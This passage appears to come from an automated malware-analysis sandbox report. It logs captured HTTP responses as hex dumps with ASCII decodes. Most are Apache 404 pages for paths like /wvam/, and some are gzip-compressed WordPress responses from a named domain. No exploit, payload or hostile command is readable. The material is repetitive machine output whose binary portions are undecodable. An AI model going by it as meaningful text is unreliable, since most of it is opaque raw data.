65 31 d0 4c 83 6b e2 0b a6 63 38 2f 0a 2d b7 02 6e 7f fe f7 ff 13 73 89 08 ff fe ff 2a 02 d2 95 6a 16 31 f2 f9 a7 57 dd 4e 67 48 20 e3 61 c0 3e 32 a6 93 3c 68 85 2a bd 69 97 85 67 37 82 cb 7b a2 41 8c ce 23 69 5c 87 31 d8 30 39 27 09 7e 8d ce db ed bd d2 b2 ef aa ac c6 84 05 2d 99 85 1a b1 b3 0c 75 60 59 26 78 c8 2c 57 b2 ad 8d f9 f2 21 15 78 e5 da 8d 6a df 03 44 24 63 9a ed 53 22 9f 6b f6 f7 5c 0d 6b 65 eb 5a 62 6d 66 fc 0a 02 ed 31 82 b4 6b af a6 11 01 6a 9c a2 c4 ff fe 7f 34 57 e6 d5 b4 f0 df a1 99 4d 7e 26 d4 3c b3 b7 67 53 2e 23 35 6d dd 4d 33 48 d5 07 fe 1e ac e5 32 36 64 44 e6 b5 80 19 f8 ab 16 35 7f 81 fd 5b fb b7 b6 69 4d 5b 4a c7 bf b5 8b c5 9b df 10 5c c3 6f ed a2 f8 b7 76 67 d0 f2 5a bd df da 97 dd 87 cb ee 6f ed 5a b3 06 0f 16 eb 5b 99 8c f1 60 26 f1 cb f0 b0 b0 40 c3 f7 77 25 20 7e b9 b3 ca 75 08 35 7f 5e 43 67 a1 a4 45 d9 02 bf 80 df 13 e3 b7 f6 34 a3 5c 86 22 8f 5c b7 0f a6 08 14 75 14 d7 05 38 72 2b e5 b2 f5 c1 fc 61 02 7a 74 d1 1a b4 06 b5 c7 c7 e1 59 fb 8b 4f c8 2f 09 37 64 cc 05 10 7c b3 dc 2a 1a 83 04 8d 7d 23 f2 45 fb ec 93 71 2e 43 b7 d6 3a 6f ca c6 7c c2 34 51 4d d3 84 e1 32 4e c2 3a 34 e6 56 cf 8a 3b 3b 9a 9b 3c cb 94 b6 bf 80 b1 c6 87 a6 e5 29 7e b1 34 f3 eb 12 a6 e4 5b 04 6e b4 26 4c e4 f0 d3 b8 de 78 1c 1a 30 06 61 de 5b a5 51 ac 96 01 fb 03 8e 5c 57 cd ff f5 fe a7 7f 6d 19 ab 71 75 7c 3c ab db 46 e3 11 d5 08 13 d7 ee f1 71 d5 3e ab 63 0f 47 0d 5a 21 8e aa ff 02 a1 ad 7b 4d af 89 67 26 27 0c 97 c1 23 9b ac 8f 09 f0 38 b1 0d 0c e0 d4 e2 17 5c 66 dd 62 ba d7 18 96 03 38 96 7f e5 d2 f6 ba 5f 69 cd 66 75 68 c5 c8 c9 6d 12 b9 b3 53 a0 5b 11 26 36 9a 7a 54 7f 05 27 59 70 6a be 15 9b c6 50 83 cd b5 24 b6 05 68 82 59 7d b5 57 94 af 31 5f 5c c2 68 34 d2 bf da df 1f 1b 6b 81 f3 a5 c0 66 ca 9d fc 98 1d a2 a3 6a 63 c1 e2 9a bf 28 74 30 b5 df f2 e8 aa 17 e2 73 3c ee fd 96 8f c1 1b ff 96 77 3d 2f c2 e7 05 bb 2c 23 b5 83 69 c1 56 5a e3 0f 9f 74 fc 4f b6 61 a3 31 db f8 ee Data Ascii: 65SSJe]ol\ "qX(*[
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 03 Jul 2024 15:52:00 GMTServer: ApacheContent-Length: 203Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 77 76 61 6d 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /wvam/ was not found on this server.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 03 Jul 2024 15:52:03 GMTServer: ApacheContent-Length: 203Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 77 76 61 6d 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /wvam/ was not found on this server.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 03 Jul 2024 15:52:06 GMTServer: ApacheContent-Length: 203Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 77 76 61 6d 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /wvam/ was not found on this server.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 03 Jul 2024 15:52:08 GMTServer: ApacheContent-Length: 203Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 77 76 61 6d 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /wvam/ was not found on this server.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 03 Jul 2024 15:52:15 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 03 Jul 2024 15:52:17 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 03 Jul 2024 15:52:20 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 03 Jul 2024 15:52:22 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeDate: Wed, 03 Jul 2024 15:52:28 GMTServer: ApacheX-Powered-By: PHP/8.2.20Expires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Link: <http://architect-usschool.com/wp-json/>; rel="https://api.w.org/"Content-Encoding: gzipData Raw: 35 34 30 32 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ed bd 5b 97 db 46 b2 2e f8 2c ff 0a 98 5a 2d 57 6d 13 e0 9d ac 2a a9 d4 23 cb 72 6f cf b1 2c 1f 4b ee 9e 3d 96 17 17 48 82 55 90 48 82 0d 90 75 b1 5a 3f e6 3c 9e 87 f3 b0 d7 79 9b c7 f1 1f 9b 2f 22 32 13 09 30 41 b2 2e b2 bd d7 1a 5d aa 48 20 2f 91 91 91 71 cb c8 c8 27 9f 4f 92 f1 ea 7a 19 79 e7 ab f9 ec e9 67 4f e8 97 37 0b 17 67 a7 b5 68 e1 ff f4 ba 46 cf a2 70 f2 f4 b3 07 4f e6 d1 2a f4 c6 e7 61 9a 45 ab d3 da 4f 6f be f1 8f f0 fa 81 7a b1 08 e7 d1 69 ed 22 8e 2e 97 49 ba aa 79 e3 64 b1 8a 16 28 78 19 4f 56 e7 a7 93 e8 22 1e 47 3e 7f a9 7b f1 22 5e c5 e1 cc cf c6 e1 2c 3a 6d 51 33 4f 66 f1 e2 bd 97 46 b3 d3 da 32 4d a6 f1 2c aa 79 e7 69 34 3d ad 9d af 56 cb 93 46 e3 6c be 3c 0b 92 f4 ac 71 35 5d 34 5a 52 67 15 af 66 d1 d3 1f c2 b3 c8 5b 24 2b 6f 9a ac 17 13 ef d1 c3 a3 76 ab f5 d8 7b 96 8e cf e3 55 34 5e 61 1c 4f 1a 52 f4 33 19 05 03 fb 45 9a 8c 92 55 f6 85 01 f5 8b 45 12 2f 26 d1 55 1d 8d 4d 93 d9 2c b9 fc c2 6b 00 01 06 b2 2f 26 8b cc 5f 02 a8 68 35 3e ff 42 c0 fb a2 d1 58 ce c2 eb 28 0d 2e e2 79 94 04 e3 64 be 5f ad cb cb cb e0 3a 59 af d6 a3 c8 51 a9 16 ce 56 51 ba 08 57 40 03 4d d0 69 2d 5c 2e 67 f1 38 5c c5 c9 a2 91 66 d9 97 57 f3 19 5e 11 02 4e 6b f6 50 bd 47 69 f8 cf 75 f2 d8 fb 26 8a 26 25 1c 86 06 25 eb 2c 1b 9f 27 c9 8c ba 6e 4c 51 b2 51 2b 8e f5 1e 00 78 9e cc e7 20 81 ec 06 90 00 1a ae 62 83 94 8d d3 78 b9 52 58 58 45 57 ab c6 bb f0 22 94 a7 a0 9c c6 bf 79 4f 3e ff f9 f9 d7 cf de 3c fb d9 fb b7 c6 67 97 98 c3 e4 32 18 5e 2e a3 79 f2 2e 7e 1d ad 56 f1 e2 2c f3 4e bd 0f b5 51 98 45 3f a5 b3 da 09 13 55 76 f2 b6 f1 b6 91 05 97 44 56 6f 1b f1 1c 74 94 bd 6d 8c 93 34 7a db e0 ca 6f 1b ad 6e d0 0c 9a 6f 1b 83 f6 d5 a0 fd b6 51 ab d7 00 00 ea 07 cb c5 19 be 64 17 67 b7 6b 0f 15 b9 35 fc 7e 21 0d e2 13 35 98 ac d3 71 54 3b f9 50 c3 02 c2 6c 33 18 0a 5e 06 d7 3d 85 6f 1b 97 4b 3f 5e 8c 67 eb 09 0d e1 1d fe e3 01 57 f6 b1 a6 22 8c 3b 98 c7 8b e0 5d f6 d7 8b 28 3d ed 07 dd a0 57 fb f8 f1 31 b0 f7 b9 f7 e6 3c ce 3c 5a 71 1e 7e 87 eb 55 e2 9f 45 8b 28 45 e7 13 42 e8 e7 d3 f5 62 4c 64 77 10 d7 17 87 1f 2e c2 d4 4b ea 59 3d 7a ac 9f 7b e3 83 e8 f0 c3 2a bd e6 77 ab d3 0f d9 7a 49 4c e0 4d 94 ad b2 93 a8 be c2 c2 c8 56 e1 7c 79 72 b0 88 2e bd af d1 f0 61 70 11 ce d6 d1 ab e9 c1 e1 c7 c7 59 94 65 68 fe f5 2a 49 31 03 01 d8 cb b7 18 f7 41 52 ff 3f 5f bf fa 3e c8 56 29 e6 2f 9e 5e 1f ac 0e 0f 3f 02 25 e3 73 ea ee e3 47 d3 fd f2 00 7d 10 68 58 48 18 6a fa 23 d6 fc 41 b3 de ac e3 7b b8 00 a9 04 c2 76 cc d7 f3 28 3e 3b 5f 1d e2 3d 46 3d 7b 83 19 3d 58 a1 78 f3 f0 31 0d 6e Data Ascii: 5402[F.,Z-Wm
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeDate: Wed, 03 Jul 2024 15:52:31 GMTServer: ApacheX-Powered-By: PHP/8.2.20Expires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Link: <http://architect-usschool.com/wp-json/>; rel="https://api.w.org/"Content-Encoding: gzipData Raw: 35 34 30 32 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ed bd 5b 97 db 46 b2 2e f8 2c ff 0a 98 5a 2d 57 6d 13 e0 9d ac 2a a9 d4 23 cb 72 6f cf b1 2c 1f 4b ee 9e 3d 96 17 17 48 82 55 90 48 82 0d 90 75 b1 5a 3f e6 3c 9e 87 f3 b0 d7 79 9b c7 f1 1f 9b 2f 22 32 13 09 30 41 b2 2e b2 bd d7 1a 5d aa 48 20 2f 91 91 91 71 cb c8 c8 27 9f 4f 92 f1 ea 7a 19 79 e7 ab f9 ec e9 67 4f e8 97 37 0b 17 67 a7 b5 68 e1 ff f4 ba 46 cf a2 70 f2 f4 b3 07 4f e6 d1 2a f4 c6 e7 61 9a 45 ab d3 da 4f 6f be f1 8f f0 fa 81 7a b1 08 e7 d1 69 ed 22 8e 2e 97 49 ba aa 79 e3 64 b1 8a 16 28 78 19 4f 56 e7 a7 93 e8 22 1e 47 3e 7f a9 7b f1 22 5e c5 e1 cc cf c6 e1 2c 3a 6d 51 33 4f 66 f1 e2 bd 97 46 b3 d3 da 32 4d a6 f1 2c aa 79 e7 69 34 3d ad 9d af 56 cb 93 46 e3 6c be 3c 0b 92 f4 ac 71 35 5d 34 5a 52 67 15 af 66 d1 d3 1f c2 b3 c8 5b 24 2b 6f 9a ac 17 13 ef d1 c3 a3 76 ab f5 d8 7b 96 8e cf e3 55 34 5e 61 1c 4f 1a 52 f4 33 19 05 03 fb 45 9a 8c 92 55 f6 85 01 f5 8b 45 12 2f 26 d1 55 1d 8d 4d 93 d9 2c b9 fc c2 6b 00 01 06 b2 2f 26 8b cc 5f 02 a8 68 35 3e ff 42 c0 fb a2 d1 58 ce c2 eb 28 0d 2e e2 79 94 04 e3 64 be 5f ad cb cb cb e0 3a 59 af d6 a3 c8 51 a9 16 ce 56 51 ba 08 57 40 03 4d d0 69 2d 5c 2e 67 f1 38 5c c5 c9 a2 91 66 d9 97 57 f3 19 5e 11 02 4e 6b f6 50 bd 47 69 f8 cf 75 f2 d8 fb 26 8a 26 25 1c 86 06 25 eb 2c 1b 9f 27 c9 8c ba 6e 4c 51 b2 51 2b 8e f5 1e 00 78 9e cc e7 20 81 ec 06 90 00 1a ae 62 83 94 8d d3 78 b9 52 58 58 45 57 ab c6 bb f0 22 94 a7 a0 9c c6 bf 79 4f 3e ff f9 f9 d7 cf de 3c fb d9 fb b7 c6 67 97 98 c3 e4 32 18 5e 2e a3 79 f2 2e 7e 1d ad 56 f1 e2 2c f3 4e bd 0f b5 51 98 45 3f a5 b3 da 09 13 55 76 f2 b6 f1 b6 91 05 97 44 56 6f 1b f1 1c 74 94 bd 6d 8c 93 34 7a db e0 ca 6f 1b ad 6e d0 0c 9a 6f 1b 83 f6 d5 a0 fd b6 51 ab d7 00 00 ea 07 cb c5 19 be 64 17 67 b7 6b 0f 15 b9 35 fc 7e 21 0d e2 13 35 98 ac d3 71 54 3b f9 50 c3 02 c2 6c 33 18 0a 5e 06 d7 3d 85 6f 1b 97 4b 3f 5e 8c 67 eb 09 0d e1 1d fe e3 01 57 f6 b1 a6 22 8c 3b 98 c7 8b e0 5d f6 d7 8b 28 3d ed 07 dd a0 57 fb f8 f1 31 b0 f7 b9 f7 e6 3c ce 3c 5a 71 1e 7e 87 eb 55 e2 9f 45 8b 28 45 e7 13 42 e8 e7 d3 f5 62 4c 64 77 10 d7 17 87 1f 2e c2 d4 4b ea 59 3d 7a ac 9f 7b e3 83 e8 f0 c3 2a bd e6 77 ab d3 0f d9 7a 49 4c e0 4d 94 ad b2 93 a8 be c2 c2 c8 56 e1 7c 79 72 b0 88 2e bd af d1 f0 61 70 11 ce d6 d1 ab e9 c1 e1 c7 c7 59 94 65 68 fe f5 2a 49 31 03 01 d8 cb b7 18 f7 41 52 ff 3f 5f bf fa 3e c8 56 29 e6 2f 9e 5e 1f ac 0e 0f 3f 02 25 e3 73 ea ee e3 47 d3 fd f2 00 7d 10 68 58 48 18 6a fa 23 d6 fc 41 b3 de ac e3 7b b8 00 a9 04 c2 76 cc d7 f3 28 3e 3b 5f 1d e2 3d 46 3d 7b 83 19 3d 58 a1 78 f3 f0 31 0d 6e Data Ascii: 5402[F.,Z-Wm
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeDate: Wed, 03 Jul 2024 15:52:31 GMTServer: ApacheX-Powered-By: PHP/8.2.20Expires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Link: <http://architect-usschool.com/wp-json/>; rel="https://api.w.org/"Content-Encoding: gzipData Raw: 35 34 30 32 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ed bd 5b 97 db 46 b2 2e f8 2c ff 0a 98 5a 2d 57 6d 13 e0 9d ac 2a a9 d4 23 cb 72 6f cf b1 2c 1f 4b ee 9e 3d 96 17 17 48 82 55 90 48 82 0d 90 75 b1 5a 3f e6 3c 9e 87 f3 b0 d7 79 9b c7 f1 1f 9b 2f 22 32 13 09 30 41 b2 2e b2 bd d7 1a 5d aa 48 20 2f 91 91 91 71 cb c8 c8 27 9f 4f 92 f1 ea 7a 19 79 e7 ab f9 ec e9 67 4f e8 97 37 0b 17 67 a7 b5 68 e1 ff f4 ba 46 cf a2 70 f2 f4 b3 07 4f e6 d1 2a f4 c6 e7 61 9a 45 ab d3 da 4f 6f be f1 8f f0 fa 81 7a b1 08 e7 d1 69 ed 22 8e 2e 97 49 ba aa 79 e3 64 b1 8a 16 28 78 19 4f 56 e7 a7 93 e8 22 1e 47 3e 7f a9 7b f1 22 5e c5 e1 cc cf c6 e1 2c 3a 6d 51 33 4f 66 f1 e2 bd 97 46 b3 d3 da 32 4d a6 f1 2c aa 79 e7 69 34 3d ad 9d af 56 cb 93 46 e3 6c be 3c 0b 92 f4 ac 71 35 5d 34 5a 52 67 15 af 66 d1 d3 1f c2 b3 c8 5b 24 2b 6f 9a ac 17 13 ef d1 c3 a3 76 ab f5 d8 7b 96 8e cf e3 55 34 5e 61 1c 4f 1a 52 f4 33 19 05 03 fb 45 9a 8c 92 55 f6 85 01 f5 8b 45 12 2f 26 d1 55 1d 8d 4d 93 d9 2c b9 fc c2 6b 00 01 06 b2 2f 26 8b cc 5f 02 a8 68 35 3e ff 42 c0 fb a2 d1 58 ce c2 eb 28 0d 2e e2 79 94 04 e3 64 be 5f ad cb cb cb e0 3a 59 af d6 a3 c8 51 a9 16 ce 56 51 ba 08 57 40 03 4d d0 69 2d 5c 2e 67 f1 38 5c c5 c9 a2 91 